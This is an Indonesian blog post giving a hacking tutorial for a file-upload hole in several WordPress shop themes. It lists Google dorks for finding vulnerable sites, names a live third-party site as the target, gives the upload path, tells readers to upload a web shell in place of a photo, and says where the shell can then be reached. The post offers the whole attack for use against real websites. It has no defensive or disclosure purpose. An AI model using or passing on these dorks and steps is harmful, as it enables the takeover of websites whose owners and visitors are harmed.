PPC Iklan Blogger Indonesia

Kamis, 16 Mei 2013

0 wordpress themes store vuln (shell upload) + video

Date: Kamis, 16 Mei 2013 08.15
Category:
Author: Unknown
Share:
Responds: 0 Comment

Dork :
inurl:/wp-content/themes/WPStore
inurl:/wp-content/themes/eShop
inurl:/wp-content/themes/KidzStore
inurl:/wp-content/themes/Emporium
inurl:/wp-content/themes/Store
inurl:/wp-content/themes/eCommerce
inurl:/wp-content/themes/framework

Oke kita mulai masukan salah satu dork diatas kedalam mesin pencaharian google. oke lihat gambar dibawah.
saya ambil dork yang inurl:/wp-content/themes/framework
pilih salah satu website yang ada disitu. saya ambil live target http://www.compareukprice.com/wp-content/themes/framework/upload/
Exploit : www.site.com/wp-content/themes/TYPESTORE/upload

upload file Pilih Berkas , upload shell ya jangan upload photo
pilih salah satu shell kamu seperti gambar diatas
tunggu sampai proses loading selesai , kalau loading tidak selesai-selesai tinggalkan saja web itu
jika sudah , proses loadingnya akan hilang , seperti gambar diatas
jika semua proses diatas sudah selesai kamu bisa langsung akses shell kamu.
di
www.site.com/wp-content/uploads/products_img/NAMASHELLKAMU.typefile
atau
www.site.com/wp-content/uploads/TAHUNUPLOADKAMU/BULANUPLOADKAMU/NAMASHELLKAMU.typefile

contoh :


Artikel Terkait :

google dork
Shell Hacking
Internet


Posting Komentar